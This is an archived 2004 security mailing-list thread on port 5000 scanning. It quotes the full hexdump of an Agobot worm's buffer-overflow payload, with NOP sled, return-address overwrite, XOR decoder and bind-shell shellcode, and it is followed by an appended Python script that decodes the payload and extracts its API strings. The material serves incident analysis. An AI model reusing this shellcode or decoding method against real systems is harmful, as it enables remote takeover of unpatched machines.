Re: TCP port 5000 syn increasing

From: Noel Cuillandre (n.cuillandrewanadoo.fr)
Date: Mon May 17 2004 - 16:08:39 CDT


It's a buffer overflow attack on the plug and play service on TCP port
5000.
The hexdump corresponds to a SQL Slammer-like worm.

Noel Cuillandre

Paul Schmehl wrote:

>----- Original Message -----
>From: "ANDREW STREULE" <brother_wolfbtopenworld.com>
>To: <incidentssecurityfocus.com>
>Sent: Monday, May 17, 2004 2:24 PM
>Subject: Re: TCP port 5000 syn increasing
>
>>on my honeypot a port 5000 event is almost always
>>followed by 1 or 2 nbt smb events.
>>
>Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming
>from boxes infected with Agobot/Gaobot and not just 81.x.x.x.
>
>00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>000000F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w
>00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd.........
>00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
>00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f.
>00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p
>00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4
>00000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j.
>00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b
>00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{
>00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X.
>000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X..
>000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q.
>000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A..
>000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f.
>000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y.....
>000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f.
>00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b
>00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^......
>00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^...
>00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q.
>00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{
>00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff.......
>00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................
>00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................
>00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................
>00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................
>000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................
>000002B0 FA FC E9 ED 99 0D 0A 0D 0A .........
>
>Paul Schmehl (paulsutdallas.edu)
>Adjunct Information Security Officer
>The University of Texas at Dallas
>AVIEN Founding Member
>http://www.utdallas.edu/~pauls/
>
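
The diagnosis above can be checked against the quoted hexdump itself. The Python script below is an added example and not code from the thread: it parses Paul's dump, measures the NOP sled, reads the four bytes that break the sled as a little-endian pointer, looks for an XOR decoder stub of the shape `mov cx, N` / `xor byte [edx+ecx], key` / `loop` right after it, reverses that loop over the bytes it covers, and lists the printable strings in the result. The function names and the instruction pattern searched for are this example's own assumptions; the only input is the capture from the message, with the sixteen all-0x90 lines at the start regenerated rather than retyped. Nothing is claimed about which DLL the overwrite value points into, since the thread does not say.

```python
import re
import struct

# Paul Schmehl's port 5000 capture from the message above. Offsets 0x000-0x0F0 are
# sixteen lines of 0x90 and are regenerated here to keep the listing short; the
# lines from 0x100 on are copied verbatim, ASCII column included.
HEXDUMP = "\n".join(f"{i * 16:08X} " + " ".join(["90"] * 16) for i in range(16)) + "\n" + """\
00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w
00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd.........
00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f.
00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p
00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4
00000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j.
00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b
00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{
00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X.
000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X..
000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q.
000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A..
000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f.
000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y.....
000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f.
00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b
00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^......
00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^...
00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q.
00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{
00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff.......
00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................
00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................
00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................
00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................
000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................
000002B0 FA FC E9 ED 99 0D 0A 0D 0A .........
"""

def parse_hexdump(text: str) -> bytes:
    """Parse 'OFFSET HH HH ... ascii' lines (optionally '>'-quoted) into bytes.

    Up to 16 hex pairs are taken per line; the first token that is not a hex
    pair is the start of the ASCII column. Offsets must be contiguous, which
    catches a dropped or duplicated line in a pasted dump.
    """
    data = bytearray()
    for raw in text.splitlines():
        tokens = raw.lstrip(">").split()
        if not tokens:
            continue
        if int(tokens[0], 16) != len(data):
            raise ValueError(f"offset {tokens[0]} does not follow {len(data):#x}")
        for tok in tokens[1:17]:
            if not re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
                break
            data.append(int(tok, 16))
    return bytes(data)

def nop_sled_length(buf: bytes) -> int:
    """Number of leading 0x90 (x86 NOP) bytes."""
    n = 0
    while n < len(buf) and buf[n] == 0x90:
        n += 1
    return n

def overwrite_value(buf: bytes) -> int:
    """The dword that breaks the sled, read as a little-endian x86 pointer.
    On the buffer-overflow reading above this is what lands on the saved
    return address; which DLL it points into is not stated in the thread."""
    return struct.unpack_from("<I", buf, nop_sled_length(buf))[0]

# mov cx, imm16 / xor byte [edx+ecx], imm8 / loop rel8: the decoder shape this
# example assumes and searches for (the result below confirms the guess).
DECODER = re.compile(rb"\x66\xB9(..)\x80\x34\x0A(.)\xE2.", re.DOTALL)

def find_decoder(buf: bytes):
    """Return (start, length, key) of the XOR-encoded region.

    The stub's call pushes the address of the byte after it; pop edx / dec edx
    bias that by one, and the loop xors [edx+ecx] for ecx = length .. 1, i.e.
    exactly `length` bytes beginning right after the call instruction.
    """
    m = DECODER.search(buf)
    if m is None:
        raise ValueError("no xor-loop decoder stub found")
    length = struct.unpack("<H", m.group(1))[0]
    key = m.group(2)[0]
    call_at = buf.index(b"\xE8", m.end())  # E8 rel32: the call back into the stub
    start = call_at + 5
    if start + length > len(buf):
        raise ValueError("decoder length runs past the captured payload")
    return start, length, key

def decode_payload(buf: bytes) -> bytes:
    start, length, key = find_decoder(buf)
    return bytes(b ^ key for b in buf[start:start + length])

def api_strings(decoded: bytes, min_len: int = 4) -> list:
    """Printable runs in the decoded payload; the Win32/Winsock names the
    shellcode resolves by hand show up here."""
    return [s.decode("ascii")
            for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, decoded)]

if __name__ == "__main__":
    buf = parse_hexdump(HEXDUMP)
    start, length, key = find_decoder(buf)
    print(f"{len(buf)} bytes, NOP sled {nop_sled_length(buf)}, "
          f"overwrite 0x{overwrite_value(buf):08x}, xor key 0x{key:02x}, "
          f"{length} encoded bytes from 0x{start:x}")
    print(api_strings(decode_payload(buf)))
```

Run against the capture, the sled is 268 bytes, the overwrite dword is 0x77e33f4d, the stub xors 358 bytes with key 0x99, and the decoded payload carries "GetProcAddress", "LoadLibraryA", "CreateProcessA", "ExitProcess", "ws2_32", "WSASocketA", "bind", "listen", "accept" and a "cmd" string, which is what a bind-shell payload that resolves its imports at run time looks like. The offset check in the parser matters in practice: dumps pasted through mail clients often lose or duplicate a line, and a silent gap there would shift every offset the analysis depends on.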